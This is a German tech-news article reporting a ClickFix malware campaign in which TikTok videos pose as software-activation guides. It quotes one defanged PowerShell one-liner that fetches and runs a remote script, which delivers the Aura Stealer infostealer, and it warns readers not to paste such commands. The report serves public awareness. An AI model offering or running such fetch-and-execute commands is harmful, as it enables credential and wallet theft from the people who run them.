LONDON (IT BOLTWISE) – Eine neue Welle von Cyberangriffen nutzt TikTok-Videos, um Malware zu verbreiten. Diese Videos geben vor, kostenlose Aktivierungsanleitungen für beliebte Software zu bieten, während sie tatsächlich schädliche Skripte ausführen.

 Heutige Tagesdeals bei Amazon!  ˗ˋˏ$ˎˊ˗

Cyberkriminelle haben eine neue Methode entwickelt, um Malware zu verbreiten, indem sie TikTok-Videos als Köder verwenden. Diese Videos geben vor, kostenlose Aktivierungsanleitungen für beliebte Software wie Windows, Spotify und Netflix zu bieten. Doch anstatt legitime Anleitungen zu liefern, führen sie die Nutzer in die Irre und veranlassen sie, schädliche PowerShell-Befehle auszuführen.

Der Sicherheitsforscher Xavier Mertens hat diese Kampagne entdeckt, die in ihrer Struktur der von Trend Micro im Mai beobachteten ähnelt. Die TikTok-Videos täuschen vor, Anleitungen zur Aktivierung legitimer Produkte wie Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro und Discord Nitro zu bieten. Auch fiktive Dienste wie Netflix und Spotify Premium werden vorgetäuscht.

Stellenangebote

AI Engineer (m/w/d)
Obungi GmbH
Hamburg, Kiel, Bremen, Lübeck, Lüneburg
Technischer Redakteur - KI - Medizintechnik (m/w/d)
Ziehm Imaging GmbH
Nürnberg
Referent für Digitalisierung, KI und Datenmanagement (m/w/d)
Sparkasse Langenfeld
Langenfeld
AI Manager Bundesverwaltung (m/w/d)
Sopra Steria
bundesweit, Berlin, Frankfurt, Hamburg, Köln, Leipzig, München
Junior Produktmanager (m/w/d) Automatisierung & KI, InsurTech
CHECK24
Hamburg
Alle KI-Jobs ansehen

Die Videos nutzen eine Technik namens ClickFix, eine Form des Social Engineering, bei der scheinbar legitime Anweisungen gegeben werden, die die Nutzer dazu verleiten, schädliche Skripte auszuführen. Jeder Clip zeigt einen kurzen Einzeiler, den die Zuschauer als Administrator in PowerShell ausführen sollen, wie zum Beispiel: iex (irm slmgr[.]win/photoshop).

Wird dieser Befehl ausgeführt, verbindet sich PowerShell mit der Remote-Site slmgr[.]win, um ein weiteres PowerShell-Skript herunterzuladen und auszuführen. Dieses Skript lädt zwei ausführbare Dateien von Cloudflare-Seiten herunter. Die erste Datei, updater.exe, ist eine Variante der Aura Stealer Malware, die gespeicherte Anmeldedaten von Browsern, Authentifizierungscookies, Kryptowährungs-Wallets und anderen Anwendungen sammelt und an die Angreifer überträgt.

Zusätzlich wird eine weitere Nutzlast namens source.exe heruntergeladen, die dazu verwendet wird, Code mit dem integrierten Visual C# Compiler von .NET selbst zu kompilieren. Der Zweck dieser zusätzlichen Nutzlast bleibt unklar. Nutzer, die diese Schritte ausführen, sollten davon ausgehen, dass alle ihre Anmeldedaten kompromittiert sind, und sofort ihre Passwörter auf allen besuchten Websites zurücksetzen.

ClickFix-Angriffe haben im vergangenen Jahr an Popularität gewonnen und werden zur Verbreitung verschiedener Malware-Stämme in Ransomware- und Kryptowährungsdiebstahl-Kampagnen eingesetzt. Generell sollten Nutzer niemals Text von einer Website kopieren und in einem Betriebssystem-Dialogfeld ausführen, einschließlich der Adressleiste des Datei-Explorers, der Eingabeaufforderung, der PowerShell-Eingabeaufforderungen, des macOS-Terminals und der Linux-Shells.

*Amazon-Kreditkarte ohne Jahresgebühr mit 2.000 Euro Verfügungsrahmen bestellen! a‿z

🤖 Alle KI-Gadgets auf Amazon ansehen!


Bestseller Nr. 1 ᵃ⤻ᶻ «KI Gadgets»
Neu 2025 KI Übersetzer Kopfhörer, 3-in-1 Echtzeit Sprachübersetzer Ohrhörer mit 164 Sprachen & 7 Modi, Bluetooth 5.4 Kopfhörer Übersetzer mit App, LED Display, 42H Laufzeit für Reisen Weiß
Neu 2025 KI Übersetzer Kopfhörer, 3-in-1 Echtzeit Sprachübersetzer Ohrhörer mit 164 Sprachen & 7 Modi, Bluetooth 5.4 Kopfhörer Übersetzer mit App, LED Display, 42H Laufzeit für Reisen Weiß
37,99 EUR Amazon Prime
Bestseller Nr. 2 ᵃ⤻ᶻ «KI Gadgets»
Neu 2025 KI Übersetzer Kopfhörer, 3-in-1 Echtzeit Sprachübersetzer Ohrhörer mit 164 Sprachen & 7 Modi, Bluetooth 5.4 Kopfhörer Übersetzer mit App, LED Display, 42H Laufzeit für Reisen/Business Schwarz
Neu 2025 KI Übersetzer Kopfhörer, 3-in-1 Echtzeit Sprachübersetzer Ohrhörer mit 164 Sprachen & 7 Modi, Bluetooth 5.4 Kopfhörer Übersetzer mit App, LED Display, 42H Laufzeit für Reisen/Business Schwarz
35,99 EUR Amazon Prime
Bestseller Nr. 3 ᵃ⤻ᶻ «KI Gadgets»
Apple AirTag - Finde und behalte Deine Sachen im Blick: Schlüssel, Geldbörsen, Gepäck, Rucksäcke und mehr. Einfaches Einrichten mit iPhone oder iPad. Austauschbare Batterie
Apple AirTag - Finde und behalte Deine Sachen im Blick: Schlüssel, Geldbörsen, Gepäck, Rucksäcke und mehr. Einfaches Einrichten mit iPhone oder iPad. Austauschbare Batterie
30,90 EUR Amazon Prime
Bestseller Nr. 4 ᵃ⤻ᶻ «KI Gadgets»
KI Übersetzer Kopfhörer, Bluetooth 5.4 Kopfhörer Übersetzer mit 164 Sprachen kopfhörer übersetzer echtzeit mit 7 Modi, ENC Rauschunterdrückung AI-Assistent 56H Laufzeit für Business, Reisen und Lernen
KI Übersetzer Kopfhörer, Bluetooth 5.4 Kopfhörer Übersetzer mit 164 Sprachen kopfhörer übersetzer echtzeit mit 7 Modi, ENC Rauschunterdrückung AI-Assistent 56H Laufzeit für Business, Reisen und Lernen
29,99 EUR Amazon Prime
Bestseller Nr. 5 ᵃ⤻ᶻ «KI Gadgets»
Neu 2025 KI Übersetzer Kopfhörer, 3-in-1 Echtzeit Sprachübersetzer Ohrhörer mit 164 Sprachen & 7 Modi, Bluetooth 5.4 Kopfhörer Übersetzer mit App, LED Display, 42H Laufzeit für Reisen Roségold
Neu 2025 KI Übersetzer Kopfhörer, 3-in-1 Echtzeit Sprachübersetzer Ohrhörer mit 164 Sprachen & 7 Modi, Bluetooth 5.4 Kopfhörer Übersetzer mit App, LED Display, 42H Laufzeit für Reisen Roségold
35,99 EUR Amazon Prime

Hat Ihnen der Artikel bzw. die News - Cyberkriminelle nutzen TikTok für Malware-Verbreitung - gefallen? Dann abonnieren Sie uns doch auf Insta: AI News, Tech Trends & Robotics - Instagram - Boltwise

Unseren KI-Morning-Newsletter «Der KI News Espresso» mit den besten KI-News des letzten Tages gratis per eMail - ohne Werbung: Hier kostenlos eintragen!

Cyberkriminelle nutzen TikTok für Malware-Verbreitung
Cyberkriminelle nutzen TikTok für Malware-Verbreitung (Foto: DALL-E, IT BOLTWISE)

Stellenangebote

(Senior) Entwickler Generative AI (m/w/d)

BearingPoint GmbH
Frankfurt am Main, München, Stuttgart, Walldorf, Düsseldorf, Hamburg, Leipzig

Marketingspezialist (m/w/d) Schwerpunkt Website, SEO & KI-Content in Elternzeitvertretung für 2 Jahre

Roto Frank Dachsystem-Technologie
Bad Mergentheim bei Würzburg

Duales Studium BWL - Spezialisierung Artificial Intelligence (B.A.) am Campus oder virtuell

IU Internationale Hochschule
Düsseldorf

Masterstudent für Thesis zu künstlicher Intelligenz (KI) (w/m/d)

TÜV SÜD
München

KI Engineer (m/w/d)

CITTI Handelsgesellschaft mbH & Co. KG
Kiel

Wissenschaftliche Sachverständige / Wissenschaftlicher Sachverständiger Bild- und Videoforensik mit Schwerpunkt KI (w/m/d)

Bundeskriminalamt
Wiesbaden
Alle KI-Jobs ansehen
Folgen Sie aktuellen Beiträge über KI & Robotik auf Twitter, Telegram, Facebook oder LinkedIn!
Hinweis: Teile dieses Textes könnten mithilfe Künstlicher Intelligenz generiert worden sein. Die auf dieser Website bereitgestellten Informationen stellen keine Finanzberatung dar und sind nicht als solche gedacht. Die Informationen sind allgemeiner Natur und dienen nur zu Informationszwecken. Wenn Sie Finanzberatung für Ihre individuelle Situation benötigen, sollten Sie den Rat von einem qualifizierten Finanzberater einholen. IT BOLTWISE® schließt jegliche Regressansprüche aus.

Diesen Artikel kommentieren


Ähnliche Beiträge aus unserem „Boltwise®“-Archiv:
  1. OpenAI stoppt KI-Videoerstellung von Martin Luther King Jr. SAN FRANCISCO / LONDON (IT BOLTWISE) – OpenAI hat die Erstellung von KI-generierten Videos, die Martin Luther King Jr. ähneln, vorübergehend gestoppt. Diese Entscheidung folgt auf Anfragen von Dr. Kings Nachlass, nachdem respektlose Darstellungen seines...
  2. Google entdeckt neue russische Malware-Familien von COLDRIVER-Hackern LONDON (IT BOLTWISE) – Google hat drei neue Malware-Familien identifiziert, die von der russischen Hackergruppe COLDRIVER entwickelt wurden. Diese Entdeckung deutet auf eine erhöhte Aktivität der Gruppe hin, die sich auf die Entwicklung und Verfeinerung...
  3. Stealit-Malware nutzt Node.js SEA für Angriffe LONDON (IT BOLTWISE) – Eine neue Malware-Kampagne namens Stealit nutzt die Single Executable Application (SEA) Funktion von Node.js, um schädliche Software zu verbreiten. Die Malware wird über gefälschte Installationsprogramme für Spiele und VPNs verbreitet und...
  4. TA585: Eine neue Bedrohung in der Cyberkriminalität LONDON (IT BOLTWISE) – Ein neuer Akteur in der Welt der Cyberkriminalität, bekannt als TA585, hat mit seiner ausgeklügelten Malware MonsterV2 für Aufsehen gesorgt. Diese Bedrohung nutzt raffinierte Phishing-Kampagnen, um ihre Ziele zu erreichen und...
  5. Neue russische Malware-Familien von COLDRIVER entdeckt LONDON (IT BOLTWISE) – Google hat drei neue Malware-Familien identifiziert, die von der russischen Hackergruppe COLDRIVER entwickelt wurden. Diese Entdeckung deutet auf eine erhöhte Aktivität der Gruppe hin, die sich auf gezielte Angriffe spezialisiert hat....
  6. ChaosBot: Neue Rust-basierte Malware nutzt Discord zur Kontrolle von PCs TORONTO / LONDON (IT BOLTWISE) – Eine neue Malware namens ChaosBot, die in der Programmiersprache Rust entwickelt wurde, sorgt für Aufsehen in der Cybersecurity-Welt. Diese Schadsoftware nutzt Discord-Kanäle, um infizierte Computer fernzusteuern und stellt eine...
  7. Trumps KI-Videos: Machtspiel mit digitaler Täuschung WASHINGTON D.C. / LONDON (IT BOLTWISE) – In einer Welt, in der digitale Täuschung immer mehr an Bedeutung gewinnt, nutzt Donald Trump KI-generierte Videos, um seine Macht zu demonstrieren. Diese Videos, die oft absurde Szenarien...
  8. Neue Android-Spyware ClayRat bedroht Nutzer mit gefälschten Apps MOSKAU / LONDON (IT BOLTWISE) – Eine neue Android-Spyware namens ClayRat zielt auf Nutzer in Russland ab, indem sie beliebte Apps wie WhatsApp und TikTok imitiert. Die Malware nutzt Telegram-Kanäle und Phishing-Websites, um sich zu...
  9. Neue Amazon-Gadgets: Smarte Helfer für den Alltag LONDON (IT BOLTWISE) – Amazon hat kürzlich eine Reihe neuer Gadgets vorgestellt, die das Potenzial haben, den Alltag erheblich zu erleichtern. Von verbesserten Smart-Home-Geräten bis hin zu innovativen Sicherheitslösungen bietet das Sortiment eine Vielzahl von...

Die nächste Stufe der Evolution: Wenn Mensch und Maschine eins werden | Wie Futurist, Tech-Visionär und Google-Chef-Ingenieur Ray Kurzweil die Zukunft der Künstlichen Intelligenz sieht
Die nächste Stufe der Evolution: Wenn Mensch und Maschine eins werden | Wie Futurist, Tech-Visionär und Google-Chef-Ingenieur Ray Kurzweil die Zukunft der Künstlichen Intelligenz sieht
  • Die nächste Stufe der Evolution
24,00 EUR
Bei Amazon ansehen
Künstliche Intelligenz: Dem Menschen überlegen – wie KI uns rettet und bedroht | Der Neurowissenschaftler, Psychiater und SPIEGEL-Bestsellerautor von »Digitale Demenz«
Künstliche Intelligenz: Dem Menschen überlegen – wie KI uns rettet und bedroht | Der Neurowissenschaftler, Psychiater und SPIEGEL-Bestsellerautor von »Digitale Demenz«
  • Künstliche Intelligenz: Dem Menschen überlegen – wie KI uns rettet und bedroht | Der Neurowissenschaftler, Psychiater und SPIEGEL-Bestsellerautor von »Digitale Demenz«
24,00 EUR
Bei Amazon ansehen
KI Exzellenz: Erfolgsfaktoren im Management jenseits des Hypes. Zukunftstechnologien verstehen und künstliche Intelligenz erfolgreich in der Arbeitswelt nutzen. (Haufe Fachbuch)
KI Exzellenz: Erfolgsfaktoren im Management jenseits des Hypes. Zukunftstechnologien verstehen und künstliche Intelligenz erfolgreich in der Arbeitswelt nutzen. (Haufe Fachbuch)
  • Odoi, Tawia(Autor)
29,99 EUR Amazon Prime
Bei Amazon ansehen
Künstliche Intelligenz und Hirnforschung: Neuronale Netze, Deep Learning und die Zukunft der Kognition
Künstliche Intelligenz und Hirnforschung: Neuronale Netze, Deep Learning und die Zukunft der Kognition
  • Krauss, Patrick(Autor)
24,99 EUR Amazon Prime
Bei Amazon ansehen
Ergänzungen und Infos bitte an die Redaktion per eMail an de-info[at]it-boltwise.de. Da wir bei KI-erzeugten News und Inhalten selten auftretende KI-Halluzinationen nicht ausschließen können, bitten wir Sie bei Falschangaben und Fehlinformationen uns via eMail zu kontaktieren und zu informieren. Bitte vergessen Sie nicht in der eMail die Artikel-Headline zu nennen: "Cyberkriminelle nutzen TikTok für Malware-Verbreitung".
Stichwörter Cyberattack Infostealer Malware PowerShell Tiktok
Alle Märkte in Echtzeit verfolgen - 30 Tage kostenlos testen!
Nächster Artikel

Effektivität des Japanischen Gehens: Ein Blick auf die gesundheitlichen Vorteile

21. Oktober 2025
Vorheriger Artikel

St-Georges Eco-Mining: Neue Nickel- und PGE-Funde in Quebec

21. Oktober 2025

Du hast einen wertvollen Beitrag oder Kommentar zum Artikel "Cyberkriminelle nutzen TikTok für Malware-Verbreitung" für unsere Leser?

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert

  • Die aktuellen intelligenten Ringe, intelligenten Brillen, intelligenten Uhren oder KI-Smartphones auf Amazon entdecken! (Sponsored)

    • Es werden alle Kommentare moderiert!

    Für eine offene Diskussion behalten wir uns vor, jeden Kommentar zu löschen, der nicht direkt auf das Thema abzielt oder nur den Zweck hat, Leser oder Autoren herabzuwürdigen.

    Wir möchten, dass respektvoll miteinander kommuniziert wird, so als ob die Diskussion mit real anwesenden Personen geführt wird. Dies machen wir für den Großteil unserer Leser, der sachlich und konstruktiv über ein Thema sprechen möchte.

    Du willst nichts verpassen?

    Du möchtest über ähnliche News und Beiträge wie "Cyberkriminelle nutzen TikTok für Malware-Verbreitung" informiert werden? Neben der E-Mail-Benachrichtigung habt ihr auch die Möglichkeit, den Feed dieses Beitrags zu abonnieren. Wer natürlich alles lesen möchte, der sollte den RSS-Hauptfeed oder IT BOLTWISE® bei Google News wie auch bei Bing News abonnieren.
    Nutze die Google-Suchmaschine für eine weitere Themenrecherche: »Cyberkriminelle nutzen TikTok für Malware-Verbreitung« bei Google Deutschland suchen, bei Bing oder Google News!

    791 Leser gerade online auf IT BOLTWISE®
    KI-Jobs